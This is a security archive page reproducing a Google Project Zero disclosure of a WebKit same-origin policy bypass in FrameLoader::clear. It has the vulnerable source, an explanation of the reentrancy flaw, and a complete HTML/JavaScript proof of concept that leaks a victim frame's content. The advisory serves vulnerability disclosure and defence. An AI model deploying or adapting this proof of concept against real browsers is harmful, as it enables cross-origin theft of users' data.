exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WebKit FrameLoader::clear Same-Origin Policy Bypass

WebKit FrameLoader::clear Same-Origin Policy Bypass
Posted Oct 8, 2019
Authored by Google Security Research, Glazvunov

WebKit suffers from a same-origin policy bypass vulnerability in FrameLoader::clear.

tags | exploit, bypass
SHA-256 | 334e5b8a59befbfda5f832467d0a3088d6e29ced2e3ce411870872bfc402e694

WebKit FrameLoader::clear Same-Origin Policy Bypass

Change Mirror Download
WebKit: Same-Origin Policy bypass in FrameLoader::clear

VULNERABILITY DETAILS
```
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
m_frame.editor().clear();

if (!m_needsClear)
return; // ***1***
m_needsClear = false;

if (m_frame.document()->pageCacheState() != Document::InPageCache) {
m_frame.document()->cancelParsing(); // ***2***
[...]
if (clearWindowProperties)
m_frame.windowProxy().setDOMWindow(newDocument->domWindow()); // ***3***
```

This bug is similar to https://bugs.chromium.org/p/project-zero/issues/detail?id=1162. In certain
circumstances, `Document::cancelParsing`[2], which is not guarded by `FrameNavigationDisabler`,
might fire the `readystatechanged` event handler. If the handler performs a synchronous document
load, the reentrant `clear` call for the new document will exit early[1] and won't update the
active global object of the page[3], so the new document will use the old (potentially
cross-origin) global object for JavaScript execution. An attacker can exploit it to partially leak
the content of the new document.


VERSION
WebKit revision 246877
Safari version 12.1.1 (14607.2.6.1.1)


REPRODUCTION CASE
```
<body>
<script>
function createURL(data, type = 'text/html') {
return URL.createObjectURL(new Blob([data], {type: type}));
}

function waitForLoad() {
showModalDialog(createURL(`
<script>
let it = setInterval(() => {
try {
opener.victim_frame.contentDocument.x;
} catch (e) {
clearInterval(it);
window.close();
}
}, 0);
</scrip` + 't>'));
}

window.onclick = () => {
victim_frame = document.body.appendChild(document.createElement('iframe'));

victim_frame.contentDocument.open();
victim_frame.contentDocument.onreadystatechange = () => {
victim_frame.contentDocument.onreadystatechange = null;

victim_frame.contentDocument.open();
audio = victim_frame.contentDocument.appendChild(document.createElement('audio'));
counter = 0;
victim_frame.contentDocument.onreadystatechange = () => {
if (++counter != 2) {
return;
}

victim_frame.contentWindow.func = function(value) {
alert('leaked: ' + value);
}

let a = victim_frame.contentDocument.createElement('a');
a.href = victim_url;
a.click();

waitForLoad();
};
audio.src = location + '?' + 'A'.repeat(10000) + Math.random();
victim_frame.contentDocument.close();
document.implementation.createHTMLDocument().adoptNode(audio);
};

victim_frame.src = 'javascript:\"\"';
}

victim_url = 'data:text/html,<body><script>func(\"secret value\")<\\/script></body>';

ext = document.body.appendChild(document.createElement('iframe'));
ext.src = victim_url;
</script>
</body>
```


CREDIT INFORMATION
Sergei Glazunov of Google Project Zero


This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made
broadly available (whichever is earlier), the bug report will become visible to the public.






Found by: glazunov@google.com

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close